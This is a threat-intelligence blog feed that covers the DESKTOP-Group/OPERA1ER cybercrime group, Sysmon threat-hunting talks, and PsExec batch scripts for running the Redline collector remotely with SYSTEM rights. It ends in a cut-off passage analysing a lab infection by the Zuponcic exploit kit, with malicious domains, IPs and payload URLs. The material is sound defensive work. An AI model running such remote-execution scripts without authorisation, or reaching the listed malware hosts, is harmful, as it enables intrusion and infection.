tag:blogger.com,1999:blog-47671997328584345392024-03-14T02:11:05.419-07:00c-APT-ureTomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.comBlogger24125tag:blogger.com,1999:blog-4767199732858434539.post-55035865610705456962022-01-26T04:55:00.004-08:002023-07-06T03:11:30.698-07:00Who is "DESKTOP-Group"?<p><span style="font-family: arial;"><span style="color: #cc0000;"><b>Update 2023-07-05: </b></span></span><span style="font-family: arial;">Suspected key figure of notorious cybercrime group arrested in joint operation. </span><span style="font-family: arial;">Operation Nervone has dealt a significant blow to the OPERA1ER group.</span></p><p><span style="font-family: arial;"><a href="https://www.interpol.int/en/News-and-Events/News/2023/Suspected-key-figure-of-notorious-cybercrime-group-arrested-in-joint-operation">INTERPOL announcement about Operation Nervone</a><br /></span></p><p><span style="font-family: arial;"></span></p><div class="separator" style="clear: both; text-align: center;"><span style="font-family: arial;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhk8vkmY8U89jdgeTSHpUwMBZhKLyxmGMuQh2QB-1-VsSGuQqb5CzOABGMbVIKcgtizZzj6f-zd-o8K61Ov7Pono03Z0TxiRLRFQsS0S8MPfkxOCLvXHq9ZBuYSfKJoquKNLbDKumaKrFUe0ilABiMpoRiSbpv_Rxz4Db8m0MDacdUqVfvIrJXjvZZCelMv" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="367" data-original-width="759" height="217" src="https://blogger.googleusercontent.com/img/a/AVvXsEhk8vkmY8U89jdgeTSHpUwMBZhKLyxmGMuQh2QB-1-VsSGuQqb5CzOABGMbVIKcgtizZzj6f-zd-o8K61Ov7Pono03Z0TxiRLRFQsS0S8MPfkxOCLvXHq9ZBuYSfKJoquKNLbDKumaKrFUe0ilABiMpoRiSbpv_Rxz4Db8m0MDacdUqVfvIrJXjvZZCelMv=w448-h217" width="448" /></a></span></div><span style="font-family: arial;"><br /></span><p></p><p><span style="color: #cc0000; font-family: arial;"><b>Update 2022-11-06:</b></span><span style="font-family: arial;"> A few days ago Group-IB released the report "</span><i style="font-family: arial;">OPERA1ER - Playing God without permission</i><span style="font-family: arial;">" (</span><a href="https://www.group-ib.com/resources/threat-research/opera1er.html" style="font-family: arial;" target="_blank">blog</a><span style="font-family: arial;">, </span><a href="https://github.com/c-APT-ure/my-public-stuff/blob/master/Group-IB_RPRT_OPERA1ER_EN_full.pdf" style="font-family: arial;" target="_blank">report PDF</a><span style="font-family: arial;">, </span><a href="https://www.youtube.com/watch?v=B6C8laHIQhk" style="font-family: arial;" target="_blank">webinar</a><span style="font-family: arial;">), linking different aliases to "</span><i style="font-family: arial;">DESKTOP-Group</i><span style="font-family: arial;">":</span></p><p></p><ul style="text-align: left;"><li><span style="font-family: verdana;">Group-IB: OPERA1ER</span></li><li><span style="font-family: verdana;">Orange-CERT-CC: NXSMS</span></li><li><span style="font-family: verdana;">SWIFT: Common Raven</span></li><li><span style="font-family: verdana;">Symantec: Bluebottle</span></li><li><span style="font-family: verdana;">Mandiant: UNC4044 <i>(not in the report)</i></span></li></ul><p></p><p><span style="font-family: arial;">--</span></p><p><span style="font-family: arial;">This is just a preliminary post about my research of a threat actor (TA) or group (TG) that we have named "DESKTOP-Group". Other companies (Orange-CERT, Group-IB, SWIFT) have other names for this TA, but they are not yet publicly known or linked yet. <i>(I will update this post, as soon as more becomes public)</i></span></p><p><span style="font-family: arial;">We started tracking this TA's activity in early 2018, while analyzing the first malware laden attack mails during February 2018. For the next three years, we saw and analyzed 170 distinct attack mails (campaigns) from this TA, but during 2021 it became harder to link malware mails back to them with high confidence.</span></p><p><span style="font-family: arial;">The first public presentation "<i>DESKTOP-Group – Tracking a Persistent Threat Group (using Email Headers)</i>" was at <a href="https://www.botconf.eu/botconf-2019/schedule/" target="_blank">BotConf 2019</a>. Slides (<a href="https://github.com/c-APT-ure/my-public-stuff/blob/master/BotConf-2019_DESKTOP-Group_Tom-Ueltschi_PUBLIC.pdf" target="_blank">PDF</a>) are available from my <a href="https://github.com/c-APT-ure/my-public-stuff/" target="_blank">Github repo</a>.</span></p><p><span style="font-family: arial;">In 2020, I also presented about this TA at ReversingLabs <a href="https://twitter.com/search?q=%23Reversing2020&src=typed_query&f=live" target="_blank">#Reversing2020</a> online conference. A <a href="https://www.youtube.com/watch?v=bha-TpjXwwg" target="_blank">video</a> (starts around <a href="https://youtu.be/bha-TpjXwwg?t=873" target="_blank">14:30m</a>) and <a href="https://www.reversinglabs.com/hubfs/Reversing%202020/Presentations/Tom%20Ueltschi%20Presentation.pdf" target="_blank">PDF slides</a> are also available.</span></p><p><span style="font-family: arial;">In 2019, I started sharing on Twitter about this TA, later starting to use the hashtag <a href="https://twitter.com/search?q=%23DESKTOPgroup&src=typed_query&f=live" target="_blank">#DESKTOPgroup</a>.</span></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://lh3.googleusercontent.com/-oxQw-d-qaqM/YfFCCJJa0gI/AAAAAAAACa4/RCFHf65WFNImdGW7ZiDEtynxZI9chRlsgCNcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: arial;"><img alt="" data-original-height="699" data-original-width="603" height="396" src="https://lh3.googleusercontent.com/-oxQw-d-qaqM/YfFCCJJa0gI/AAAAAAAACa4/RCFHf65WFNImdGW7ZiDEtynxZI9chRlsgCNcBGAsYHQ/w341-h396/image.png" width="341" /></span></a></div><span style="font-family: arial;"><br />There is also a <a href="https://groups.google.com/g/desktop-group-research" target="_blank">closed Google-group for research collaboration</a>, mostly with people tracking or having access to emails or logs, related this TA's activity.</span><p></p><p><span style="font-family: arial;">Malware samples and URLs have been shared and tagged on Abuse.ch <a href="https://bazaar.abuse.ch/browse/tag/DESKTOP-group/" target="_blank">Malware Bazaar</a> or <a href="https://urlhaus.abuse.ch/browse/tag/DESKTOP-group/" target="_blank">URLhaus</a>.</span></p><p><br /></p>TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com0tag:blogger.com,1999:blog-4767199732858434539.post-24079462313005547532017-12-06T14:43:00.002-08:002022-01-26T05:18:29.436-08:00Is this blog still alive?<span face=""arial" , "helvetica" , sans-serif">Is this blog still alive? That's a valid question since I haven't blogged for quite some time. </span><br />
<i><span face=""arial" , "helvetica" , sans-serif">(wow, has it really been more than 3 years!?)</span></i><br />
<span face=""arial" , "helvetica" , sans-serif">So I finally decided to write another post about some stuff that happened in the meantime...</span><br />
<span face=""arial" , "helvetica" , sans-serif"><br /></span>
<span face=""arial" , "helvetica" , sans-serif">For the past few years I have been more active on Twitter (<a href="https://twitter.com/c_APT_ure" target="_blank">@c_APT_ure</a>) and also presenting at conferences and collaborating in closed / trusted groups.</span><br />
<span face=""arial" , "helvetica" , sans-serif"><br /></span>
<span face=""arial" , "helvetica" , sans-serif">My most recent area of interest has been increasing endpoint visibility using <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon" target="_blank">Sysinternals Sysmon</a> and sending logs into Splunk for incident detection and threat hunting.</span><br />
<span face=""arial" , "helvetica" , sans-serif"><br /></span>
<span face=""arial" , "helvetica" , sans-serif">My first presentation was in December 2016 at BotConf:</span><br />
<span face=""arial" , "helvetica" , sans-serif"><br /></span>
<span face=""arial" , "helvetica" , sans-serif"><i>"<a href="https://www.botconf.eu/2016/advanced-incident-detection-and-threat-hunting-using-sysmon-and-splunk/" target="_blank">Advanced Incident Detection and Threat Hunting using Sysmon (and Splunk)</a>"</i></span><br />
<span face=""arial" , "helvetica" , sans-serif"><br /></span>
<span face=""arial" , "helvetica" , sans-serif">Slides: <a href="https://www.botconf.eu/wp-content/uploads/2016/11/PR12-Sysmon-UELTSCHI.pdf">https://www.botconf.eu/wp-content/uploads/2016/11/PR12-Sysmon-UELTSCHI.pdf</a></span><br />
<span face=""arial" , "helvetica" , sans-serif">Video: <a href="https://www.youtube.com/watch?v=vv_VXntQTpE">https://www.youtube.com/watch?v=vv_VXntQTpE</a></span><br />
<span face=""arial" , "helvetica" , sans-serif"><br /></span>
<span face=""arial" , "helvetica" , sans-serif">In 2017 I gave an updated version on the same topic at the FIRST annual conference.</span><br />
<span face=""arial" , "helvetica" , sans-serif"><br /></span>
<span face=""arial" , "helvetica" , sans-serif">Slides: <a href="https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf">https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf</a></span><br />
<span face=""arial" , "helvetica" , sans-serif"><br /></span>
<span face=""arial" , "helvetica" , sans-serif">In April 2018 at <a href="https://www.first.org/events/colloquia/amsterdam2018/program#pAdvanced-Incident-Detection-and-Threat-hunting-with-Sysmon-Splunk" target="_blank">FIRST TC Amsterdam</a>, I gave an updated version from the FIRST 2017 talk.</span><br />
<br />
<span face=""arial" , "helvetica" , sans-serif">Slides: <a href="http://security-research.dyndns.org/pub/slides/FIRST-TC-2018/FIRST-TC-2018_Tom-Ueltschi_Sysmon_PUBLIC.pdf">FIRST-TC-2018_Tom-Ueltschi_Sysmon_PUBLIC.pdf</a> (<a href="https://github.com/c-APT-ure/my-public-stuff/blob/master/FIRST-TC-2018_Tom-Ueltschi_Sysmon_PUBLIC.pdf" target="_blank">Github</a> / <a href="https://github.com/c-APT-ure/my-public-stuff/raw/master/FIRST-TC-2018_Tom-Ueltschi_Sysmon_PUBLIC.pdf">raw | D/L</a>)</span><br />
<span face=""arial" , "helvetica" , sans-serif"><br /></span>
<span face=""arial" , "helvetica" , sans-serif"></span><br />
<span face=""arial" , "helvetica" , sans-serif">At BotConf 2018, I presented again on using Sysmon and Splunk, but also including Powershell Logging and MITRE ATT&CK as well.</span><br />
<span face=""arial" , "helvetica" , sans-serif">"<a href="https://www.botconf.eu/botconf-2018/botconf-2018-schedule/" target="_blank">Hunting and Detecting APTs using Sysmon and PowerShell Logging</a>"</span><br />
<span face=""arial" , "helvetica" , sans-serif"><br /></span>
<span face=""arial" , "helvetica" , sans-serif">Slides: <a href="https://www.botconf.eu/wp-content/uploads/2018/12/2018-Tom-Ueltschi-Sysmon.pdf" target="_blank">2018-Tom-Ueltschi-Sysmon.pdf</a></span><br />
<span face=""arial" , "helvetica" , sans-serif">Video: <i>(was recorded and will be published soon)</i></span><br />
<span face=""arial" , "helvetica" , sans-serif"><br /></span>
<span face=""arial" , "helvetica" , sans-serif">CERT-EU annual conf 2019 presentation about "Practical Threat Hunting"</span><br />
<span face=""arial" , "helvetica" , sans-serif">Slides: [<a href="https://github.com/c-APT-ure/my-public-stuff/blob/master/CERT-EU-2019_Threat-Hunting_Tom-Ueltschi_TLP-WHITE.pdf" target="_blank">github</a> / <a href="https://github.com/c-APT-ure/my-public-stuff/raw/master/CERT-EU-2019_Threat-Hunting_Tom-Ueltschi_TLP-WHITE.pdf" target="_blank">raw | D/L</a>]</span>
<span face=""arial" , "helvetica" , sans-serif"><br /></span><br />
<span face=""arial" , "helvetica" , sans-serif">BotConf 2019</span><br />
<a href="https://botconf2019.sched.com/event/VrbL/desktop-group-tracking-a-persistent-threat-group-using-email-headers" style="font-family: arial, helvetica, sans-serif;" target="_blank">"DESKTOP-Group" – Tracking a Persistent Threat Group (using Email Headers)</a><span face=""arial" , "helvetica" , sans-serif"></span><br />
<div>
<span face=""arial" , "helvetica" , sans-serif">Slides should be published soon.</span></div>
<span face=""arial" , "helvetica" , sans-serif">(<a href="https://twitter.com/c_APT_ure/status/1179062052150743040">Tweet</a>)</span><div><br /></div><div><span style="color: red;">For anything related to "DESKTOP-Group", please see my later post:</span></div><div><a href="http://c-apt-ure.blogspot.com/2022/01/who-is-desktop-group.html">http://c-apt-ure.blogspot.com/2022/01/who-is-desktop-group.html</a><br />
<span face=""arial" , "helvetica" , sans-serif"><br /></span>
<span face=""arial" , "helvetica" , sans-serif">Most presentation slides should also be available on <a href="https://github.com/c-APT-ure/my-public-stuff" target="_blank">my Github page</a>.</span>
<span face=""arial" , "helvetica" , sans-serif"><br /></span>
<span face=""arial" , "helvetica" , sans-serif">There are many good resources for further reading that I can suggest.</span><br />
<br />
<ul>
<li><span face=""arial" , "helvetica" , sans-serif"><a href="https://github.com/MHaggis/sysmon-dfir" target="_blank">Sysmon - DFIR</a> (Mike Haag / @MHaggis)</span></li>
<ul>
<li><span face=""arial" , "helvetica" , sans-serif"><a href="https://github.com/MHaggis/sysmon-dfir#sysmon-configuration" target="_blank">Sysmon Config files</a></span></li>
</ul>
<li><span face=""arial" , "helvetica" , sans-serif"><a href="https://github.com/Cyb3rWard0g/ThreatHunter-Playbook" target="_blank">ThreatHunter-Playbook</a> (Roberto Rodriguez / @Cyb3rWard0g)</span></li>
<li><span face=""arial" , "helvetica" , sans-serif"><a href="https://github.com/Neo23x0/sigma/tree/master/rules/windows/sysmon" target="_blank">SIGMA rules for Sysmon</a> (Florian Roth / @cyb3rops)</span></li>
<li><span face=""arial" , "helvetica" , sans-serif"><a href="https://www.darkoperator.com/blog/2017/11/24/operational-look-at-sysinternals-sysmon-620-update" target="_blank">Operational Look at Sysinternals Sysmon 6.20 Update</a></span></li>
<li><span face=""arial" , "helvetica" , sans-serif">Technet Blog: <a href="https://blogs.technet.microsoft.com/motiba/2017/12/07/sysinternals-sysmon-suspicious-activity-guide/" target="_blank">Sysinternals Sysmon suspicious activity guide</a></span></li>
</ul>
<br />
<span face=""arial" , "helvetica" , sans-serif">The list of resources may get updated every so often...</span><br />
<span face=""arial" , "helvetica" , sans-serif" style="font-size: x-small;"><i><br /></i></span>
<span face=""arial" , "helvetica" , sans-serif" style="font-size: x-small;"><i>(last updated: 2022-01-26)</i></span><br />
<br /></div>TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com0tag:blogger.com,1999:blog-4767199732858434539.post-63239625517359456782014-08-12T14:29:00.000-07:002017-12-06T13:44:07.033-08:003R4LR - Running Redline Remotely for Live Response<div style="text-align: center;">
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: red;"><strike>This blog post is a work in progress and I'd love to get feedback while writing it. </strike></span></span></span></div>
<strike><br /></strike>
<div style="text-align: center;">
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: red;"><strike>So while this note appears on top, the blog post is not finished.</strike> </span></span></span></div>
<br />
<div style="text-align: center;">
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: red;"><i><strike>(Please come back again later!)</strike></i></span></span></span><br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: red;"><i><strike><br /></strike></i></span></span></span>
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: red;">This blog post will likely not be updated (finished) anymore, sorry!</span></span></span></div>
<br />
<br />
This is the second post about using Redline for Live Response. The first post covered <a href="http://c-apt-ure.blogspot.com/2014/07/using-redline-for-live-response-part-1.html" target="_blank">Using Redline for Live Response - Part 1</a>, showing how many details from artifacts can be collected with Redline.<br />
<br />
Let's take a look at the steps necessary for running Redline Collector remotely.<br />
<br />
<ol>
<li>copy the collector to the host</li>
<li>run the collector on the host</li>
<li>compress the collection data (optional)</li>
<li>copy the collection data back</li>
</ol>
<br />
I'm sure there are many ways to accomplish this, but here is the way I did it.<br />
<br />
A short batch script, taking a hostname as parameter, uses PsExec to copy and execute a remote-script to the host. The remote-script does actually the steps described above.<br />
<br />
Prerequisites:<br />
<ul>
<li>read-only network share (for collector source)</li>
<ul>
<li> <span style="font-family: "courier new" , "courier" , monospace;">\\RO-Share-Host\Redline\</span></li>
</ul>
<li>writable network share (to copy collection data back)</li>
<ul>
<li> <span style="font-family: "courier new" , "courier" , monospace;">\\RW-Share-Host\Data-Upload\</span></li>
</ul>
<li>psexec rights (as admin) on remote host for user starting scripts</li>
<ul>
<li><span style="font-family: "courier new" , "courier" , monospace;">D:\Tools\Sysinternals><span style="background-color: yellow;">psexec -s \\hostname cmd /c whoami</span></span></li>
<ul>
<li><span style="font-family: "courier new" , "courier" , monospace;">--> nt authority\system </span></li>
</ul>
</ul>
<span style="font-family: "courier new" , "courier" , monospace;">
</span></ul>
<br />
Considerations / Disadvantages:<br />
<ul>
<li>needs privileged credentials for running the collector remotely</li>
<li>collector software and data overwrites unallocated space (changing harddisk from host under investigation)</li>
</ul>
<br />
Here are the two scripts, just slightly modified (anonymized) from the original previously used. <i>(I hope I didn't introduce any typos or find/replace errors -- if so, please let me know)</i><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;"></span><br />
<pre></pre>
<span style="font-family: "courier new" , "courier" , monospace;">
</span>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;"><b>REM ============================================================================<br />REM | Usage: run-redline.cmd hostname<br />REM ============================================================================</b> </span><br />
<span style="font-family: "courier new" , "courier" , monospace;">@echo off<br /><br />REM check if remote host is online<br />ping -n 1 %1 >NUL || echo Client %1 is offline. && goto FINISHED<br /><br />echo Running Redline Collector remotely on System: %1<br />time /t<br /><br />D:\Tools\Sysinternals\psexec.exe -accepteula \\%1 -s -c D:\Tools\Mandiant\Redline\run-redline-remote.cmd %1 >> E:\Data-Upload\Audits\%1_Redline_Log.txt<br /><br />sleep 3<br /><br />D:\Tools\7z.exe x -oE:\Data-Upload\Audits\%1 E:\Data-Upload\Audits\%1\audit_%1.7z<br /><br />move E:\Data-Upload\Audits\%1_Redline_Log.txt E:\Data-Upload\Audits\%1\<br /><br />dir /s E:\Data-Upload\Audits\%1<br /><br />:FINISHED<br />echo *** Finished Redline Collector script !!!<br />time /t<br /><br /><br /><b>REM ============================================================================<br />REM | Usage: run-redline-remote.cmd hostname<br />REM ============================================================================</b><br />@echo off<br /><br />REM create new dir for Redline Collector<br />mkdir C:\Redline<br />cd C:\Redline<br /><br />echo Starting "run-redline-remote.cmd" on System: %1 >> run-redline-remote.log<br />time /t >> run-redline-remote.log<br /><br />REM copy Redline Collector executable and scripts from share<br />xcopy /E /C /Y /Q \\RO-Share-Host\Redline\Redline-Collector-Latest .<br />sleep 10<br />dir /s<br /><br /><span style="color: #351c75;">rem ----------------------------------------------------------------------------<br />rem include Helper.bat (using "call Helper.bat" didn't work)<br />rem ----------------------------------------------------------------------------<br /><br />SETLOCAL enableextensions enabledelayedexpansion<br /><br />ECHO Ensuring the proper working directory<br />%~d0<br />cd %~dp0<br /><br />REM Verify the files exist<br />SET agent64=.\x64\MIRAgent.exe<br />SET agent32=.\x86\MIRAgent.exe<br />SET script=MemoryzeAuditScript.xml<br />SET outputdir=.<br />SET bitness=%PROCESSOR_ARCHITECTURE%<br /><br />IF NOT EXIST "%agent64%" GOTO :failed<br />REM IF NOT EXIST "%agent32%" GOTO :failed<br />IF NOT EXIST "%script%" GOTO :failed<br /><br />IF "%1"=="" GOTO :usedefault<br />SET outputdir=%1<br />:usedefault<br />REM Check that the directory exists, and if not create it.<br />IF NOT EXIST "%outputdir%" CALL mkdir "%outputdir%"<br /><br />SET args=-o "..\%outputdir%" -f -script "..\%script%" -encoding none -allowmultiple<br /><br />SET agent=%agent32%<br />IF "%bitness%"=="x86" GOTO :agentset<br />IF "%bitness%"=="IA64" GOTO :unsupported<br />SET agent=%agent64%<br />:agentset<br /><br />ECHO %agent% %args%<br />REM PAUSE<br />call %agent% %args%<br /><br />GOTO :end<br /><br />:failed<br />ECHO.<br />ECHO.<br />ECHO Failure Encountered:<br />ECHO Agent and/or Redline Audit Script not found.<br />GOTO :end<br /><br />:unsupported<br />ECHO.<br />ECHO.<br />ECHO Failure Encountered:<br />ECHO This Operating System is not supported by the Memoryze Agent<br />GOTO :end<br /><br />:auditfail<br />ECHO.<br />ECHO.<br />ECHO Failure Encountered<br />ECHO %errorlevel% return from "%lastcmd%"<br />IF EXIST "%buildlog%" START notepad "%buildlog%"<br />GOTO :end<br /><br />:end<br />REM PAUSE<br />ENDLOCAL<br />rem ----------------------------------------------------------------------------</span><br /> </span><br />
<span style="font-family: "courier new" , "courier" , monospace;">echo Finished "run-redline-remote.cmd" on System: %1 >> run-redline-remote.log<br />time /t >> run-redline-remote.log<br /><br />mkdir \\RW-Share-Host\Data-Upload\Audits\%1<br />rem copy run-redline-remote.log \\RW-Share-Host\Data-Upload\Audits\%1<br /><br />rem ** copy collection without compression<br />rem xcopy /E /C /Y %1 \\RW-Share-Host\Data-Upload\Audits\%1<br /><br />rem ** copy collection WITH (7z) compression<br />7z.exe a audit_%1.7z %1<br />copy audit_%1.7z \\RW-Share-Host\Data-Upload\Audits\%1<br /><br />sleep 20<br /><br />echo Finished "run-redline-remote.cmd" on System: %1 >> run-redline-remote.log<br />time /t >> run-redline-remote.log<br /><br />copy run-redline-remote.log \\RW-Share-Host\Data-Upload\Audits\%1</span><br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span><span style="color: red;">The scripts are provided <i>as is</i> without any warranty. Use at your own risk. They may be changed without notice.</span><br />
<br />
I will update this post later with a PoC running the scripts "remotely" from the VM-host on the infected VM from the previous post.<br />
<br />
Stay tuned for more...<br />
<br />
Cheers,<br />
@c_APT_ure<br />
<br />TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com2tag:blogger.com,1999:blog-4767199732858434539.post-58761106448184102622014-07-29T07:54:00.000-07:002014-08-12T12:37:45.872-07:00Using Redline for Live Response - Part 1<span style="font-family: Arial,Helvetica,sans-serif;"></span>
<span style="font-family: Arial,Helvetica,sans-serif;">For once I'll write about something a bit different than before. It's still about <a href="http://c-apt-ure.blogspot.com/2013/12/ponmocup-hunter-is-re-tired.html" target="_blank">Ponmocup</a> malware, or more precise about the Zuponcic Kit for delivery, but more about how to do Live Response and Detection on the host using Redline.</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;">If you're not familiar with the Zuponcic Kit yet, you should read the following posts:</span><br />
<ul>
<li><span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://blog.fox-it.com/2013/12/19/not-quite-the-average-exploit-kit-zuponcic/" target="_blank">Not quite the average exploit kit: Zuponcic</a></span></li>
<li><span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://malwageddon.blogspot.com/2013/06/zuponcic-is-it-bird-is-it-plane-no-its.html" target="_blank">Zuponcic: "Is it a bird?... Is it a plane?... No, it's another Exploit Kit" - Part 1</a></span></li>
<li><span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://malwageddon.blogspot.com/2013/08/zuponcic-is-it-bird-is-it-plane-no-its.html" target="_blank">Zuponcic: "Is it a bird?... Is it a plane?... No, it's another... wait, what!?" - Part 2</a></span></li>
<li><span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://malware-traffic-analysis.net/2014/03/17/index.html" target="_blank">2014-03-17 - ZUPONCIC EK</a></span></li>
<li><span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://malware-traffic-analysis.net/2014/07/09/index.html" target="_blank">2014-07-09 - ZUPONCIC EK FROM 178.33.152.221 - MZ.WATCHWEEDSEPISODES.NET</a></span></li>
</ul>
<span style="font-family: Arial,Helvetica,sans-serif;">If you're not familiar with <a href="https://www.mandiant.com/resources/download/redline" target="_blank">Redline</a>, the great free tool from Mandiant, I recommend reading the following:</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://www.mandiant.com/library/Redline1.12_UserGuide.pdf" target="_blank">Redline User Guide</a> (latest version at time of writing v1.12)</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;">You should be familiar with the two distinct phases, collection and analysis, and the difference of a "Redline Collector" (standalone CLI tool for collection) and "Redline", the feature rich GUI application for analysis of collection data.</span><br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">So, for this blog post I infected a VM via Zuponcic Kit capturing network traffic with Wireshark and doing a Redline collection and analysis afterwards.</span><span style="font-family: Arial,Helvetica,sans-serif;"></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<br />
<h2>
<span style="font-family: Arial,Helvetica,sans-serif;">PCAP analysis with Wireshark</span></h2>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;">Here an overview of the DNS and HTTP traffic from the infection:</span><br />
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span><a href="http://4.bp.blogspot.com/-rZNIrNmNph8/U8wina3hnYI/AAAAAAAAAXo/_pt7cUY4W1M/s1600/2014-07-15_141845.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-rZNIrNmNph8/U8wina3hnYI/AAAAAAAAAXo/_pt7cUY4W1M/s1600/2014-07-15_141845.png" height="*" width="800" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://1.bp.blogspot.com/-v-4pj0i2ruU/U8windeRwXI/AAAAAAAAAXk/eSGQUtQM058/s1600/2014-07-15_141933.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-v-4pj0i2ruU/U8windeRwXI/AAAAAAAAAXk/eSGQUtQM058/s1600/2014-07-15_141933.png" height="*" width="800" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">Some of the most interesting DNS and HTTP requests are:</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: Arial,Helvetica,sans-serif;">DNS:</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;">www.niceshop.at: type A, class IN, addr 85.13.129.172</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: yellow;"><span style="font-family: "Courier New",Courier,monospace;">perrugina.sciencehunk.com: type A, class IN, addr 31.210.96.155</span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: yellow;"><span style="font-family: "Courier New",Courier,monospace;">mw.prodigymsnteregala.com: type A, class IN, addr 178.33.192.35</span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: yellow;"><span style="font-family: "Courier New",Courier,monospace;">fasternation.net: type A, class IN, addr 253.101.238.123</span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;">www.sanctionedmedia.com: type CNAME, class IN, cname sanctionedmedia.com</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;">sanctionedmedia.com: type A, class IN, addr 64.210.128.29</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: Arial,Helvetica,sans-serif;">HTTP:</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;">Default browser UA:</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;"> User-Agent: Mozilla/4.0 (compatible; <span style="background-color: yellow;">MSIE 8.0; Windows NT 6.1; WOW64;</span> Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;">http://www.google.ch/url?url=http://www.niceshop.at/&rct=j&frm=1&q=&esrc=s&sa=U&ei=eQHDU9acLdP07Aa-oICIAg&ved=0CBQQFjAA&usg=AFQjCNHz4D179x2aXXoTOLfSK_k71qrAlw</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;">http://www.niceshop.at/</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;">http://perrugina.sciencehunk.com/__utm.gif?utmwv=5.3.3&utms=7&utmn=1812125645&utmhn=isroi.com&utmcs=UTF-8&utmsr=800x600&utmvp=783x444&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=10.0%20r22&utmdt=Gambar%20Animasi%20</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;">http://mw.prodigymsnteregala.com/</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;">http://mw.prodigymsnteregala.com/<span style="background-color: yellow;">js/java.js</span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;">http://mw.prodigymsnteregala.com/<span style="background-color: yellow;">ANLxMYn.jar</span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
